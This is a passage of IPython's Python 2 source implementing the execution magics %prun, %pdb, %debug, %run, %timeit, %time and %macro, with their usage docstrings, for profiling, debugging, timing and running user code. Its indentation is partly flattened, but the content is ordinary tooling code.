from IPython.testing.skipdoctest import skip_doctest
from IPython.utils import py3compat
from IPython.utils.contexts import preserve_keys
from IPython.utils.io import capture_output
from IPython.utils.ipstruct import Struct
from IPython.utils.module_paths import find_mod
from IPython.utils.path import get_py_filename, unquote_filename, shellglob
from IPython.utils.timing import clock, clock2
from IPython.utils.warn import warn, error
#-----------------------------------------------------------------------------
# Magic implementation classes
#-----------------------------------------------------------------------------
class TimeitResult(object):
    """
    Object returned by the timeit magic with info about the run.

    Contains the following attributes:

    loops: (int) number of loops done per measurement
    repeat: (int) number of times the measurement has been repeated
    best: (float) best execution time / number
    all_runs: (list of float) execution time of each run (in s)
    compile_time: (float) time of statement compilation (s)
    """
    def __init__(self, loops, repeat, best, all_runs, compile_time, precision):
        self.loops = loops
        self.repeat = repeat
        self.best = best
        self.all_runs = all_runs
        self.compile_time = compile_time
        # Display precision used when formatting the best time
        self._precision = precision

    def _repr_pretty_(self, p , cycle):
        # IPython pretty-print hook:
        # "<TimeitResult : N loops, best of R: T per loop>"
        unic = u"%d loops, best of %d: %s per loop" % (self.loops, self.repeat,
                                                       _format_time(self.best, self._precision))
        p.text(u'<TimeitResult : '+unic+u'>')
@magics_class
class ExecutionMagics(Magics):
"""Magics related to code execution, debugging, profiling, etc.
"""
def __init__(self, shell):
super(ExecutionMagics, self).__init__(shell)
if profile is None:
self.prun = self.profile_missing_notice
# Default execution function used to actually run user code.
self.default_runner = None
def profile_missing_notice(self, *args, **kwargs):
error("""\
The profile module could not be found. It has been removed from the standard
python packages because of its non-free license. To use profiling, install the
python-profiler package from non-free.""")
@skip_doctest
@line_cell_magic
def prun(self, parameter_s='', cell=None):
"""Run a statement through the python code profiler.
Usage, in line mode:
%prun [options] statement
Usage, in cell mode:
%%prun [options] [statement]
code...
code...
In cell mode, the additional code lines are appended to the (possibly
empty) statement in the first line. Cell mode allows you to easily
profile multiline blocks without having to put them in a separate
function.
The given statement (which doesn't require quote marks) is run via the
python profiler in a manner similar to the profile.run() function.
Namespaces are internally managed to work correctly; profile.run
cannot be used in IPython because it makes certain assumptions about
namespaces which do not hold under IPython.
Options:
-l <limit>
you can place restrictions on what or how much of the
profile gets printed. The limit value can be:
* A string: only information for function names containing this string
is printed.
* An integer: only these many lines are printed.
* A float (between 0 and 1): this fraction of the report is printed
(for example, use a limit of 0.4 to see the topmost 40% only).
You can combine several limits with repeated use of the option. For
example, ``-l __init__ -l 5`` will print only the topmost 5 lines of
information about class constructors.
-r
return the pstats.Stats object generated by the profiling. This
object has all the information about the profile in it, and you can
later use it for further analysis or in other functions.
-s <key>
sort profile by given key. You can provide more than one key
by using the option several times: '-s key1 -s key2 -s key3...'. The
default sorting key is 'time'.
The following is copied verbatim from the profile documentation
referenced below:
When more than one key is provided, additional keys are used as
secondary criteria when the there is equality in all keys selected
before them.
Abbreviations can be used for any key names, as long as the
abbreviation is unambiguous. The following are the keys currently
defined:
============ =====================
Valid Arg Meaning
============ =====================
"calls" call count
"cumulative" cumulative time
"file" file name
"module" file name
"pcalls" primitive call count
"line" line number
"name" function name
"nfl" name/file/line
"stdname" standard name
"time" internal time
============ =====================
Note that all sorts on statistics are in descending order (placing
most time consuming items first), where as name, file, and line number
searches are in ascending order (i.e., alphabetical). The subtle
distinction between "nfl" and "stdname" is that the standard name is a
sort of the name as printed, which means that the embedded line
numbers get compared in an odd way. For example, lines 3, 20, and 40
would (if the file names were the same) appear in the string order
"20" "3" and "40". In contrast, "nfl" does a numeric compare of the
line numbers. In fact, sort_stats("nfl") is the same as
sort_stats("name", "file", "line").
-T <filename>
save profile results as shown on screen to a text
file. The profile is still shown on screen.
-D <filename>
save (via dump_stats) profile statistics to given
filename. This data is in a format understood by the pstats module, and
is generated by a call to the dump_stats() method of profile
objects. The profile is still shown on screen.
-q
suppress output to the pager. Best used with -T and/or -D above.
If you want to run complete programs under the profiler's control, use
``%run -p [prof_opts] filename.py [args to program]`` where prof_opts
contains profiler specific options as described here.
You can read the complete documentation for the profile module with::
In [1]: import profile; profile.help()
"""
opts, arg_str = self.parse_options(parameter_s, 'D:l:rs:T:q',
list_all=True, posix=False)
if cell is not None:
arg_str += '\n' + cell
arg_str = self.shell.input_splitter.transform_cell(arg_str)
return self._run_with_profiler(arg_str, opts, self.shell.user_ns)
def _run_with_profiler(self, code, opts, namespace):
"""
Run `code` with profiler. Used by ``%prun`` and ``%run -p``.
Parameters
----------
code : str
Code to be executed.
opts : Struct
Options parsed by `self.parse_options`.
namespace : dict
A dictionary for Python namespace (e.g., `self.shell.user_ns`).
"""
# Fill default values for unspecified options:
opts.merge(Struct(D=[''], l=[], s=['time'], T=['']))
prof = profile.Profile()
try:
prof = prof.runctx(code, namespace, namespace)
sys_exit = ''
except SystemExit:
sys_exit = """*** SystemExit exception caught in code being profiled."""
stats = pstats.Stats(prof).strip_dirs().sort_stats(*opts.s)
lims = opts.l
if lims:
lims = [] # rebuild lims with ints/floats/strings
for lim in opts.l:
try:
lims.append(int(lim))
except ValueError:
try:
lims.append(float(lim))
except ValueError:
lims.append(lim)
# Trap output.
stdout_trap = StringIO()
stats_stream = stats.stream
try:
stats.stream = stdout_trap
stats.print_stats(*lims)
finally:
stats.stream = stats_stream
output = stdout_trap.getvalue()
output = output.rstrip()
if 'q' not in opts:
page.page(output)
print sys_exit,
dump_file = opts.D[0]
text_file = opts.T[0]
if dump_file:
dump_file = unquote_filename(dump_file)
prof.dump_stats(dump_file)
print '\n*** Profile stats marshalled to file',\
repr(dump_file)+'.',sys_exit
if text_file:
text_file = unquote_filename(text_file)
pfile = open(text_file,'w')
pfile.write(output)
pfile.close()
print '\n*** Profile printout saved to text file',\
repr(text_file)+'.',sys_exit
if 'r' in opts:
return stats
else:
return None
@line_magic
def pdb(self, parameter_s=''):
"""Control the automatic calling of the pdb interactive debugger.
Call as '%pdb on', '%pdb 1', '%pdb off' or '%pdb 0'. If called without
argument it works as a toggle.
When an exception is triggered, IPython can optionally call the
interactive pdb debugger after the traceback printout. %pdb toggles
this feature on and off.
The initial state of this feature is set in your configuration
file (the option is ``InteractiveShell.pdb``).
If you want to just activate the debugger AFTER an exception has fired,
without having to type '%pdb on' and rerunning your code, you can use
the %debug magic."""
par = parameter_s.strip().lower()
if par:
try:
new_pdb = {'off':0,'0':0,'on':1,'1':1}[par]
except KeyError:
print ('Incorrect argument. Use on/1, off/0, '
'or nothing for a toggle.')
return
else:
# toggle
new_pdb = not self.shell.call_pdb
# set on the shell
self.shell.call_pdb = new_pdb
print 'Automatic pdb calling has been turned',on_off(new_pdb)
@skip_doctest
@magic_arguments.magic_arguments()
@magic_arguments.argument('--breakpoint', '-b', metavar='FILE:LINE',
    help="""
    Set break point at LINE in FILE.
    """
)
@magic_arguments.argument('statement', nargs='*',
    help="""
    Code to run in debugger.
    You can omit this in cell magic mode.
    """
)
@line_cell_magic
def debug(self, line='', cell=None):
    """Activate the interactive debugger.

    This magic command support two ways of activating debugger.
    One is to activate debugger before executing code.  This way, you
    can set a break point, to step through the code from the point.
    You can use this mode by giving statements to execute and optionally
    a breakpoint.

    The other one is to activate debugger in post-mortem mode.  You can
    activate this mode simply running %debug without any argument.
    If an exception has just occurred, this lets you inspect its stack
    frames interactively.  Note that this will always work only on the last
    traceback that occurred, so you must call this quickly after an
    exception that you wish to inspect has fired, because if another one
    occurs, it clobbers the previous one.

    If you want IPython to automatically do this on every exception, see
    the %pdb magic for more details.
    """
    args = magic_arguments.parse_argstring(self.debug, line)

    if not (args.breakpoint or args.statement or cell):
        # Nothing to run and no breakpoint: inspect the last traceback.
        self._debug_post_mortem()
    else:
        # Pre-execution mode: join the parsed statements (and cell body,
        # when used as a cell magic) and run them under the debugger.
        code = "\n".join(args.statement)
        if cell:
            code += "\n" + cell
        self._debug_exec(code, args.breakpoint)
def _debug_post_mortem(self):
    # Enter the debugger on the most recent traceback (post-mortem mode);
    # force=True makes the shell start it even if call_pdb is off.
    self.shell.debugger(force=True)
def _debug_exec(self, code, breakpoint):
    """Execute *code* under the debugger in the user namespace.

    *breakpoint*, when given, is a ``FILE:LINE`` string naming an
    initial break point; a false value means no initial break point.
    """
    bp_file = bp_line = None
    if breakpoint:
        bp_file, line_text = breakpoint.split(':', 1)
        bp_line = int(line_text)
    self._run_with_debugger(code, self.shell.user_ns, bp_file, bp_line)
@line_magic
def tb(self, s):
    """Print the last traceback with the currently active exception mode.

    See %xmode for changing exception reporting modes."""
    # `s` is the magic's argument string; it is not used here.
    self.shell.showtraceback()
@skip_doctest
@line_magic
def run(self, parameter_s='', runner=None,
        file_finder=get_py_filename):
    """Run the named file inside IPython as a program.

    Usage::

      %run [-n -i -e -G]
           [( -t [-N<N>] | -d [-b<N>] | -p [profile options] )]
           ( -m mod | file ) [args]

    Parameters after the filename are passed as command-line arguments to
    the program (put in sys.argv). Then, control returns to IPython's
    prompt.

    This is similar to running at a system prompt ``python file args``,
    but with the advantage of giving you IPython's tracebacks, and of
    loading all variables into your interactive namespace for further use
    (unless -p is used, see below).

    The file is executed in a namespace initially consisting only of
    ``__name__=='__main__'`` and sys.argv constructed as indicated. It thus
    sees its environment as if it were being run as a stand-alone program
    (except for sharing global objects such as previously imported
    modules). But after execution, the IPython interactive namespace gets
    updated with all variables defined in the program (except for __name__
    and sys.argv). This allows for very convenient loading of code for
    interactive work, while giving each program a 'clean sheet' to run in.

    Arguments are expanded using shell-like glob match.  Patterns
    '*', '?', '[seq]' and '[!seq]' can be used.  Additionally,
    tilde '~' will be expanded into user's home directory.  Unlike
    real shells, quotation does not suppress expansions.  Use
    *two* back slashes (e.g. ``\\\\*``) to suppress expansions.
    To completely disable these expansions, you can use -G flag.

    Options:

    -n
      __name__ is NOT set to '__main__', but to the running file's name
      without extension (as python does under import).  This allows running
      scripts and reloading the definitions in them without calling code
      protected by an ``if __name__ == "__main__"`` clause.

    -i
      run the file in IPython's namespace instead of an empty one. This
      is useful if you are experimenting with code written in a text editor
      which depends on variables defined interactively.

    -e
      ignore sys.exit() calls or SystemExit exceptions in the script
      being run.  This is particularly useful if IPython is being used to
      run unittests, which always exit with a sys.exit() call.  In such
      cases you are interested in the output of the test results, not in
      seeing a traceback of the unittest module.

    -t
      print timing information at the end of the run.  IPython will give
      you an estimated CPU time consumption for your script, which under
      Unix uses the resource module to avoid the wraparound problems of
      time.clock().  Under Unix, an estimate of time spent on system tasks
      is also given (for Windows platforms this is reported as 0.0).

    If -t is given, an additional ``-N<N>`` option can be given, where <N>
    must be an integer indicating how many times you want the script to
    run.  The final timing report will include total and per run results.

    For example (testing the script uniq_stable.py)::

        In [1]: run -t uniq_stable

        IPython CPU timings (estimated):
          User  : 0.19597 s.
          System: 0.0 s.

        In [2]: run -t -N5 uniq_stable

        IPython CPU timings (estimated):
        Total runs performed: 5
          Times : Total      Per run
          User  : 0.910862 s, 0.1821724 s.
          System: 0.0 s, 0.0 s.

    -d
      run your program under the control of pdb, the Python debugger.
      This allows you to execute your program step by step, watch variables,
      etc.  Internally, what IPython does is similar to calling::

          pdb.run('execfile("YOURFILENAME")')

      with a breakpoint set on line 1 of your file.  You can change the line
      number for this automatic breakpoint to be <N> by using the -bN option
      (where N must be an integer). For example::

          %run -d -b40 myscript

      will set the first breakpoint at line 40 in myscript.py.  Note that
      the first breakpoint must be set on a line which actually does
      something (not a comment or docstring) for it to stop execution.

      Or you can specify a breakpoint in a different file::

          %run -d -b myotherfile.py:20 myscript

      When the pdb debugger starts, you will see a (Pdb) prompt.  You must
      first enter 'c' (without quotes) to start execution up to the first
      breakpoint.

      Entering 'help' gives information about the use of the debugger.  You
      can easily see pdb's full documentation with "import pdb;pdb.help()"
      at a prompt.

    -p
      run program under the control of the Python profiler module (which
      prints a detailed report of execution times, function calls, etc).

      You can pass other options after -p which affect the behavior of the
      profiler itself. See the docs for %prun for details.

      In this mode, the program's variables do NOT propagate back to the
      IPython interactive namespace (because they remain in the namespace
      where the profiler executes them).

      Internally this triggers a call to %prun, see its documentation for
      details on the options available specifically for profiling.

    There is one special usage for which the text above doesn't apply:
    if the filename ends with .ipy, the file is run as ipython script,
    just as if the commands were written on IPython prompt.

    -m
      specify module name to load instead of script path. Similar to
      the -m option for the python interpreter. Use this option last if you
      want to combine with other %run options. Unlike the python interpreter
      only source modules are allowed no .pyc or .pyo files.
      For example::

          %run -m example

      will run the example module.

    -G
      disable shell-like glob expansion of arguments.

    """
    # get arguments and set sys.argv for program to be run.
    opts, arg_lst = self.parse_options(parameter_s,
                                       'nidtN:b:pD:l:rs:T:em:G',
                                       mode='list', list_all=1)
    if "m" in opts:
        # -m: resolve the module name to its source path and run that.
        modulename = opts["m"][0]
        modpath = find_mod(modulename)
        if modpath is None:
            warn('%r is not a valid modulename on sys.path'%modulename)
            return
        arg_lst = [modpath] + arg_lst
    try:
        filename = file_finder(arg_lst[0])
    except IndexError:
        warn('you must provide at least a filename.')
        print '\n%run:\n', oinspect.getdoc(self.run)
        return
    except IOError as e:
        try:
            msg = str(e)
        except UnicodeError:
            msg = e.message
        error(msg)
        return

    if filename.lower().endswith('.ipy'):
        # .ipy files are executed as IPython input, not plain Python.
        with preserve_keys(self.shell.user_ns, '__file__'):
            self.shell.user_ns['__file__'] = filename
            self.shell.safe_execfile_ipy(filename)
        return

    # Control the response to exit() calls made by the script being run
    exit_ignore = 'e' in opts

    # Make sure that the running script gets a proper sys.argv as if it
    # were run from a system shell.
    save_argv = sys.argv  # save it for later restoring

    if 'G' in opts:
        args = arg_lst[1:]
    else:
        # tilde and glob expansion
        args = shellglob(map(os.path.expanduser, arg_lst[1:]))

    sys.argv = [filename] + args  # put in the proper filename
    # protect sys.argv from potential unicode strings on Python 2:
    if not py3compat.PY3:
        sys.argv = [ py3compat.cast_bytes(a) for a in sys.argv ]

    if 'i' in opts:
        # Run in user's interactive namespace
        prog_ns = self.shell.user_ns
        __name__save = self.shell.user_ns['__name__']
        prog_ns['__name__'] = '__main__'
        main_mod = self.shell.user_module

        # Since '%run foo' emulates 'python foo.py' at the cmd line, we must
        # set the __file__ global in the script's namespace
        # TK: Is this necessary in interactive mode?
        prog_ns['__file__'] = filename
    else:
        # Run in a fresh, empty namespace
        if 'n' in opts:
            name = os.path.splitext(os.path.basename(filename))[0]
        else:
            name = '__main__'

        # The shell MUST hold a reference to prog_ns so after %run
        # exits, the python deletion mechanism doesn't zero it out
        # (leaving dangling references). See interactiveshell for details
        main_mod = self.shell.new_main_mod(filename, name)
        prog_ns = main_mod.__dict__

    # pickle fix.  See interactiveshell for an explanation.  But we need to
    # make sure that, if we overwrite __main__, we replace it at the end
    main_mod_name = prog_ns['__name__']

    if main_mod_name == '__main__':
        restore_main = sys.modules['__main__']
    else:
        restore_main = False

    # This needs to be undone at the end to prevent holding references to
    # every single object ever created.
    sys.modules[main_mod_name] = main_mod

    if 'p' in opts or 'd' in opts:
        # Profiler/debugger runs go through a small code string that is
        # exec'd/evaluated inside code_ns by the helper methods below.
        if 'm' in opts:
            code = 'run_module(modulename, prog_ns)'
            code_ns = {
                'run_module': self.shell.safe_run_module,
                'prog_ns': prog_ns,
                'modulename': modulename,
            }
        else:
            code = 'execfile(filename, prog_ns)'
            code_ns = {
                'execfile': self.shell.safe_execfile,
                'prog_ns': prog_ns,
                'filename': get_py_filename(filename),
            }

    try:
        stats = None
        with self.shell.readline_no_record:
            if 'p' in opts:
                stats = self._run_with_profiler(code, opts, code_ns)
            else:
                if 'd' in opts:
                    bp_file, bp_line = parse_breakpoint(
                        opts.get('b', ['1'])[0], filename)
                    self._run_with_debugger(
                        code, code_ns, filename, bp_line, bp_file)
                else:
                    if 'm' in opts:
                        def run():
                            self.shell.safe_run_module(modulename, prog_ns)
                    else:
                        if runner is None:
                            runner = self.default_runner
                        if runner is None:
                            runner = self.shell.safe_execfile

                        def run():
                            runner(filename, prog_ns, prog_ns,
                                   exit_ignore=exit_ignore)

                    if 't' in opts:
                        # timed execution
                        try:
                            nruns = int(opts['N'][0])
                            if nruns < 1:
                                error('Number of runs must be >=1')
                                return
                        except (KeyError):
                            nruns = 1
                        self._run_with_timing(run, nruns)
                    else:
                        # regular execution
                        run()

            if 'i' in opts:
                self.shell.user_ns['__name__'] = __name__save
            else:
                # update IPython interactive namespace

                # Some forms of read errors on the file may mean the
                # __name__ key was never set; using pop we don't have to
                # worry about a possible KeyError.
                prog_ns.pop('__name__', None)

                with preserve_keys(self.shell.user_ns, '__file__'):
                    self.shell.user_ns.update(prog_ns)
    finally:
        # It's a bit of a mystery why, but __builtins__ can change from
        # being a module to becoming a dict missing some key data after
        # %run.  As best I can see, this is NOT something IPython is doing
        # at all, and similar problems have been reported before:
        # http://coding.derkeiler.com/Archive/Python/comp.lang.python/2004-10/0188.html
        # Since this seems to be done by the interpreter itself, the best
        # we can do is to at least restore __builtins__ for the user on
        # exit.
        self.shell.user_ns['__builtins__'] = builtin_mod

        # Ensure key global structures are restored
        sys.argv = save_argv
        if restore_main:
            sys.modules['__main__'] = restore_main
        else:
            # Remove from sys.modules the reference to main_mod we'd
            # added.  Otherwise it will trap references to objects
            # contained therein.
            del sys.modules[main_mod_name]

    return stats
def _run_with_debugger(self, code, code_ns, filename=None,
                       bp_line=None, bp_file=None):
    """
    Run `code` in debugger with a break point.

    Parameters
    ----------
    code : str
        Code to execute.
    code_ns : dict
        A namespace in which `code` is executed.
    filename : str
        `code` is ran as if it is in `filename`.
    bp_line : int, optional
        Line number of the break point.
    bp_file : str, optional
        Path to the file in which break point is specified.
        `filename` is used if not given.

    Raises
    ------
    UsageError
        If the break point given by `bp_line` is not valid.
    """
    deb = debugger.Pdb(self.shell.colors)
    # reset Breakpoint state, which is moronically kept
    # in a class
    bdb.Breakpoint.next = 1
    bdb.Breakpoint.bplist = {}
    bdb.Breakpoint.bpbynumber = [None]
    if bp_line is not None:
        # Set an initial breakpoint to stop execution
        maxtries = 10
        bp_file = bp_file or filename
        checkline = deb.checkline(bp_file, bp_line)
        if not checkline:
            # Requested line is not executable; scan the next `maxtries`
            # lines for one that is (for-else: raise if none is found).
            for bp in range(bp_line + 1, bp_line + maxtries + 1):
                if deb.checkline(bp_file, bp):
                    break
            else:
                msg = ("\nI failed to find a valid line to set "
                       "a breakpoint\n"
                       "after trying up to line: %s.\n"
                       "Please set a valid breakpoint manually "
                       "with the -b option." % bp)
                raise UsageError(msg)
        # if we find a good linenumber, set the breakpoint
        deb.do_break('%s:%s' % (bp_file, bp_line))

    if filename:
        # Mimic Pdb._runscript(...)
        deb._wait_for_mainpyfile = True
        deb.mainpyfile = deb.canonic(filename)

    # Start file run
    print "NOTE: Enter 'c' at the %s prompt to continue execution." % deb.prompt
    try:
        if filename:
            # save filename so it can be used by methods on the deb object
            deb._exec_filename = filename
        deb.run(code, code_ns)

    except:
        # NOTE(review): bare except — presumably intentional so that ANY
        # failure in the debugged code gets shown as a traceback rather
        # than propagating; confirm before narrowing.
        etype, value, tb = sys.exc_info()
        # Skip three frames in the traceback: the %run one,
        # one inside bdb.py, and the command-line typed by the
        # user (run by exec in pdb itself).
        self.shell.InteractiveTB(etype, value, tb, tb_offset=3)
@staticmethod
def _run_with_timing(run, nruns):
    """
    Run function `run` and print timing information.

    Parameters
    ----------
    run : callable
        Any callable object which takes no argument.
    nruns : int
        Number of times to execute `run`.
    """
    # Wall-clock time for the whole batch; clock2() returns a
    # (user, system) CPU-time pair measured around each run.
    twall0 = time.time()
    if nruns == 1:
        t0 = clock2()
        run()
        t1 = clock2()
        t_usr = t1[0] - t0[0]
        t_sys = t1[1] - t0[1]
        print "\nIPython CPU timings (estimated):"
        print " User : %10.2f s." % t_usr
        print " System : %10.2f s." % t_sys
    else:
        # Multiple runs: time the whole loop and report total + per-run.
        runs = range(nruns)
        t0 = clock2()
        for nr in runs:
            run()
        t1 = clock2()
        t_usr = t1[0] - t0[0]
        t_sys = t1[1] - t0[1]
        print "\nIPython CPU timings (estimated):"
        print "Total runs performed:", nruns
        print " Times : %10s %10s" % ('Total', 'Per run')
        print " User : %10.2f s, %10.2f s." % (t_usr, t_usr / nruns)
        print " System : %10.2f s, %10.2f s." % (t_sys, t_sys / nruns)
    twall1 = time.time()
    print "Wall time: %10.2f s." % (twall1 - twall0)
@skip_doctest
@line_cell_magic
def timeit(self, line='', cell=None):
    """Time execution of a Python statement or expression

    Usage, in line mode:
      %timeit [-n<N> -r<R> [-t|-c] -q -p<P> -o] statement
    or in cell mode:
      %%timeit [-n<N> -r<R> [-t|-c] -q -p<P> -o] setup_code
      code
      code...

    Time execution of a Python statement or expression using the timeit
    module.  This function can be used both as a line and cell magic:

    - In line mode you can time a single-line statement (though multiple
      ones can be chained with using semicolons).

    - In cell mode, the statement in the first line is used as setup code
      (executed but not timed) and the body of the cell is timed.  The cell
      body has access to any variables created in the setup code.

    Options:

    -n<N>: execute the given statement <N> times in a loop. If this value
    is not given, a fitting value is chosen.

    -r<R>: repeat the loop iteration <R> times and take the best result.
    Default: 3

    -t: use time.time to measure the time, which is the default on Unix.
    This function measures wall time.

    -c: use time.clock to measure the time, which is the default on
    Windows and measures wall time. On Unix, resource.getrusage is used
    instead and returns the CPU user time.

    -p<P>: use a precision of <P> digits to display the timing result.
    Default: 3

    -q: Quiet, do not print result.

    -o: return a TimeitResult that can be stored in a variable to inspect
        the result in more details.

    Examples
    --------
    ::

      In [1]: %timeit pass
      10000000 loops, best of 3: 53.3 ns per loop

      In [2]: u = None

      In [3]: %timeit u is None
      10000000 loops, best of 3: 184 ns per loop

      In [4]: %timeit -r 4 u == None
      1000000 loops, best of 4: 242 ns per loop

      In [5]: import time

      In [6]: %timeit -n1 time.sleep(2)
      1 loops, best of 3: 2 s per loop

    The times reported by %timeit will be slightly higher than those
    reported by the timeit.py script when variables are accessed. This is
    due to the fact that %timeit executes the statement in the namespace
    of the shell, compared with timeit.py, which uses a single setup
    statement to import function or create variables. Generally, the bias
    does not matter as long as results from timeit.py are not mixed with
    those from %timeit."""

    import timeit

    opts, stmt = self.parse_options(line,'n:r:tcp:qo',
                                    posix=False, strict=False)
    if stmt == "" and cell is None:
        return

    timefunc = timeit.default_timer
    # number == 0 means "auto-detect a fitting loop count" (see below).
    number = int(getattr(opts, "n", 0))
    repeat = int(getattr(opts, "r", timeit.default_repeat))
    precision = int(getattr(opts, "p", 3))
    quiet = 'q' in opts
    return_result = 'o' in opts
    if hasattr(opts, "t"):
        timefunc = time.time
    if hasattr(opts, "c"):
        timefunc = clock

    timer = timeit.Timer(timer=timefunc)
    # this code has tight coupling to the inner workings of timeit.Timer,
    # but is there a better way to achieve that the code stmt has access
    # to the shell namespace?
    transform = self.shell.input_splitter.transform_cell

    if cell is None:
        # called as line magic
        ast_setup = ast.parse("pass")
        ast_stmt = ast.parse(transform(stmt))
    else:
        ast_setup = ast.parse(transform(stmt))
        ast_stmt = ast.parse(transform(cell))

    ast_setup = self.shell.transform_ast(ast_setup)
    ast_stmt = self.shell.transform_ast(ast_stmt)

    # This codestring is taken from timeit.template - we fill it in as an
    # AST, so that we can apply our AST transformations to the user code
    # without affecting the timing code.
    timeit_ast_template = ast.parse('def inner(_it, _timer):\n'
                                    '    setup\n'
                                    '    _t0 = _timer()\n'
                                    '    for _i in _it:\n'
                                    '        stmt\n'
                                    '    _t1 = _timer()\n'
                                    '    return _t1 - _t0\n')

    class TimeitTemplateFiller(ast.NodeTransformer):
        "This is quite tightly tied to the template definition above."
        def visit_FunctionDef(self, node):
            "Fill in the setup statement"
            self.generic_visit(node)
            if node.name == "inner":
                node.body[:1] = ast_setup.body

            return node

        def visit_For(self, node):
            "Fill in the statement to be timed"
            if getattr(getattr(node.body[0], 'value', None), 'id', None) == 'stmt':
                node.body = ast_stmt.body
            return node

    timeit_ast = TimeitTemplateFiller().visit(timeit_ast_template)
    timeit_ast = ast.fix_missing_locations(timeit_ast)

    # Track compilation time so it can be reported if too long
    # Minimum time above which compilation time will be reported
    tc_min = 0.1

    t0 = clock()
    code = compile(timeit_ast, "<magic-timeit>", "exec")
    tc = clock()-t0

    # Bind the compiled `inner` function onto the timer instance so
    # timer.timeit()/repeat() run the user's statement.
    ns = {}
    exec code in self.shell.user_ns, ns
    timer.inner = ns["inner"]

    if number == 0:
        # determine number so that 0.2 <= total time < 2.0
        number = 1
        for i in range(1, 10):
            if timer.timeit(number) >= 0.2:
                break
            number *= 10

    all_runs = timer.repeat(repeat, number)
    best = min(all_runs) / number
    if not quiet :
        print u"%d loops, best of %d: %s per loop" % (number, repeat,
                                                      _format_time(best, precision))
        if tc > tc_min:
            print "Compiler time: %.2f s" % tc
    if return_result:
        return TimeitResult(number, repeat, best, all_runs, tc, precision)
@skip_doctest
@needs_local_scope
@line_cell_magic
def time(self,line='', cell=None, local_ns=None):
    """Time execution of a Python statement or expression.

    The CPU and wall clock times are printed, and the value of the
    expression (if any) is returned.  Note that under Win32, system time
    is always reported as 0, since it can not be measured.

    This function can be used both as a line and cell magic:

    - In line mode you can time a single-line statement (though multiple
      ones can be chained with using semicolons).

    - In cell mode, you can time the cell body (a directly
      following statement raises an error).

    This function provides very basic timing functionality.  Use the timeit
    magic for more controll over the measurement.

    Examples
    --------
    ::

      In [1]: %time 2**128
      CPU times: user 0.00 s, sys: 0.00 s, total: 0.00 s
      Wall time: 0.00
      Out[1]: 340282366920938463463374607431768211456L

      In [2]: n = 1000000

      In [3]: %time sum(range(n))
      CPU times: user 1.20 s, sys: 0.05 s, total: 1.25 s
      Wall time: 1.37
      Out[3]: 499999500000L

      In [4]: %time print 'hello world'
      hello world
      CPU times: user 0.00 s, sys: 0.00 s, total: 0.00 s
      Wall time: 0.00

    Note that the time needed by Python to compile the given expression
    will be reported if it is more than 0.1s.  In this example, the
    actual exponentiation is done by Python at compilation time, so while
    the expression can take a noticeable amount of time to compute, that
    time is purely due to the compilation:

      In [5]: %time 3**9999;
      CPU times: user 0.00 s, sys: 0.00 s, total: 0.00 s
      Wall time: 0.00 s

      In [6]: %time 3**999999;
      CPU times: user 0.00 s, sys: 0.00 s, total: 0.00 s
      Wall time: 0.00 s
      Compiler : 0.78 s
    """

    # fail immediately if the given expression can't be compiled
    if line and cell:
        raise UsageError("Can't use statement directly after '%%time'!")

    if cell:
        expr = self.shell.input_transformer_manager.transform_cell(cell)
    else:
        expr = self.shell.input_transformer_manager.transform_cell(line)

    # Minimum time above which parse time will be reported
    tp_min = 0.1

    t0 = clock()
    expr_ast = ast.parse(expr)
    tp = clock()-t0

    # Apply AST transformations
    expr_ast = self.shell.transform_ast(expr_ast)

    # Minimum time above which compilation time will be reported
    tc_min = 0.1

    # A single expression is eval'd (so its value can be returned);
    # anything else must be exec'd and returns None.
    if len(expr_ast.body)==1 and isinstance(expr_ast.body[0], ast.Expr):
        mode = 'eval'
        source = '<timed eval>'
        expr_ast = ast.Expression(expr_ast.body[0].value)
    else:
        mode = 'exec'
        source = '<timed exec>'
    t0 = clock()
    code = compile(expr_ast, source, mode)
    tc = clock()-t0

    # skew measurement as little as possible
    glob = self.shell.user_ns
    wtime = time.time
    # time execution
    wall_st = wtime()
    if mode=='eval':
        st = clock2()
        out = eval(code, glob, local_ns)
        end = clock2()
    else:
        st = clock2()
        exec code in glob, local_ns
        end = clock2()
        out = None
    wall_end = wtime()
    # Compute actual times and report
    wall_time = wall_end-wall_st
    cpu_user = end[0]-st[0]
    cpu_sys = end[1]-st[1]
    cpu_tot = cpu_user+cpu_sys
    # On windows cpu_sys is always zero, so no new information to the next print
    if sys.platform != 'win32':
        print "CPU times: user %s, sys: %s, total: %s" % \
            (_format_time(cpu_user),_format_time(cpu_sys),_format_time(cpu_tot))
    print "Wall time: %s" % _format_time(wall_time)
    if tc > tc_min:
        print "Compiler : %s" % _format_time(tc)
    if tp > tp_min:
        print "Parser : %s" % _format_time(tp)
    return out
@skip_doctest
@line_magic
def macro(self, parameter_s=''):
    """Define a macro for future re-execution. It accepts ranges of history,
    filenames or string objects.

    Usage:\\
      %macro [options] name n1-n2 n3-n4 ... n5 .. n6 ...

    Options:

      -r: use 'raw' input.  By default, the 'processed' history is used,
      so that magics are loaded in their transformed version to valid
      Python.  If this option is given, the raw input as typed at the
      command line is used instead.

      -q: quiet macro definition.  By default, a tag line is printed
      to indicate the macro has been created, and then the contents of
      the macro are printed.  If this option is given, then no printout
      is produced once the macro is created.

    This will define a global variable called `name` which is a string
    made of joining the slices and lines you specify (n1,n2,... numbers
    above) from your input history into a single string. This variable
    acts like an automatic function which re-executes those lines as if
    you had typed them. You just type 'name' at the prompt and the code
    executes.

    The syntax for indicating input ranges is described in %history.

    Note: as a 'hidden' feature, you can also use traditional python slice
    notation, where N:M means numbers N through M-1.

    For example, if your history contains (print using %hist -n )::

      44: x=1
      45: y=3
      46: z=x+y
      47: print x
      48: a=5
      49: print 'x',x,'y',y

    you can create a macro with lines 44 through 47 (included) and line 49
    called my_macro with::

      In [55]: %macro my_macro 44-47 49

    Now, typing `my_macro` (without quotes) will re-execute all this code
    in one pass.

    You don't need to give the line-numbers in order, and any given line
    number can appear multiple times. You can assemble macros with any
    lines from your input history in any order.

    The macro is a simple object which holds its value in an attribute,
    but IPython's display system checks for macros and executes them as
    code instead of printing them when you type their name.

    You can view a macro's contents by explicitly printing it with::

      print macro_name

    """
    opts,args = self.parse_options(parameter_s,'rq',mode='list')
    if not args:   # List existing macros
        # Called with no arguments: return the sorted names of all
        # Macro objects currently in the user namespace.
        return sorted(k for k,v in self.shell.user_ns.iteritems() if\
                      isinstance(v, Macro))
    if len(args) == 1:
        raise UsageError(
            "%macro insufficient args; usage '%macro name n1-n2 n3-4...")
    # First argument is the macro name; the rest are history ranges.
    name, codefrom = args[0], " ".join(args[1:])

    #print 'rng',ranges  # dbg
    try:
        lines = self.shell.find_user_code(codefrom, 'r' in opts)
